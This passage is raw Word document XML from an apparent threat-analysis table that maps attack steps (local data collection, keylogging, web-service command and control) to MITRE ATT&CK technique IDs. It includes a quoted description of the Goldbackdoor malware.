          <w:p w14:paraId="458D139E" w14:textId="563BE01D" w:rsidR="005F312C" w:rsidRPr="00F808AD" w:rsidRDefault="00322435" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00322435">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00322435">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00322435">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Data from Local System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50365B21" w14:textId="3267A142" w:rsidR="005F312C" w:rsidRPr="00A9702F" w:rsidRDefault="00322435" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A9702F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5052ECCF" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="00A9702F" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1853A9A7" w14:textId="4CA22D67" w:rsidR="005F312C" w:rsidRPr="00A9702F" w:rsidRDefault="00322435" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A9702F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CA02716" w14:textId="4EB3959E" w:rsidR="005F312C" w:rsidRPr="00F808AD" w:rsidRDefault="00EC2E4B" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7126AEBC" w14:textId="33C35D90" w:rsidR="005F312C" w:rsidRDefault="006A35A5" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A35A5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Limited inf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">ormation on exact actions taken by the attacker here. Approximation of actions based </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>on..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="07085269" w14:textId="4ABFB949" w:rsidR="006A35A5" w:rsidRPr="00F808AD" w:rsidRDefault="006A35A5" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
            <w:r w:rsidRPr="0064704D">
              <w:t>“</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0064704D">
              <w:t>Goldbackdoor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0064704D">
              <w:t xml:space="preserve"> provides attackers with basic remote command execution, file downloading/uploading, keylogging, and the ability to remotely uninstall,” they wrote. “This functionality and implementation closely match </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0064704D">
              <w:t>Bluelight</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0064704D">
              <w:t>; however, the increased focus appears to have been placed on file collection and keylogging.”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00322435" w:rsidRPr="00B857D7" w14:paraId="23B42FBE" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0143E42F" w14:textId="35CBC30B" w:rsidR="00322435" w:rsidRDefault="00322435" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="249591E1" w14:textId="77777777" w:rsidR="00322435" w:rsidRPr="00B857D7" w:rsidRDefault="00322435" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="190A1E10" w14:textId="77777777" w:rsidR="00322435" w:rsidRPr="00B857D7" w:rsidRDefault="00322435" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000D29F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1102.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000D29F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34300911" w14:textId="5DC03775" w:rsidR="00322435" w:rsidRPr="00B857D7" w:rsidRDefault="00322435" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00A9702F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31D8AAAE" w14:textId="77777777" w:rsidR="00322435" w:rsidRPr="00B857D7" w:rsidRDefault="00322435" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60189AB5" w14:textId="77777777" w:rsidR="00322435" w:rsidRDefault="00322435" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AF3EA82" w14:textId="4508C87E" w:rsidR="00322435" w:rsidRPr="00B857D7" w:rsidRDefault="00EC2E4B" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A7849CD" w14:textId="3C181DA2" w:rsidR="00322435" w:rsidRPr="00B857D7" w:rsidRDefault="00322435" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC2E4B" w:rsidRPr="00EC2E4B" w14:paraId="6E1CD281" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43C6015D" w14:textId="3C6BF674" w:rsidR="00EC2E4B" w:rsidRPr="00EC2E4B" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC2E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E2F249A" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRPr="00EC2E4B" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC2E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EC2E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EC2E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="119BFD4B" w14:textId="7CEFB760" w:rsidR="00EC2E4B" w:rsidRPr="00EC2E4B" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EC2E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1056.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EC2E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Keylogger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2850D574" w14:textId="218D656D" w:rsidR="00EC2E4B" w:rsidRPr="00EC2E4B" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC2E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40198740" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRPr="00EC2E4B" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E66805D" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRPr="00EC2E4B" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC2E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D5728A8" w14:textId="5EFBD460" w:rsidR="00EC2E4B" w:rsidRPr="00EC2E4B" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC2E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F9A14C7" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRPr="00EC2E4B" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC2E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66127B9B" w14:textId="696D5DA8" w:rsidR="00EC2E4B" w:rsidRPr="00EC2E4B" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC2E4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Start keylogger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC2E4B" w:rsidRPr="00B857D7" w14:paraId="3D3C989D" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62C49FF7" w14:textId="0BE57942" w:rsidR="00EC2E4B" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C399F5F" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRPr="00B857D7" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39A3D4C8" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRPr="00B857D7" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000D29F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1102.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000D29F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D26CB41" w14:textId="06D55A34" w:rsidR="00EC2E4B" w:rsidRPr="00B857D7" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34506B35" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRPr="00B857D7" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C2DADFE" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F78A5AA" w14:textId="06550869" w:rsidR="00EC2E4B" w:rsidRPr="00B857D7" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62785408" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRPr="00B857D7" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="78"/>
      <w:tr w:rsidR="00EC2E4B" w:rsidRPr="00ED5880" w14:paraId="3D022BAC" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="064C42A3" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36A509C2" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRPr="00322435" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74742733" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRPr="00322435" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2710B38F" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46C53B4F" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRPr="00F808AD" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17810EAF" w14:textId="77777777" w:rsidR="00EC2E4B" w:rsidRDefault="00EC2E4B" w:rsidP="00EC2E4B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
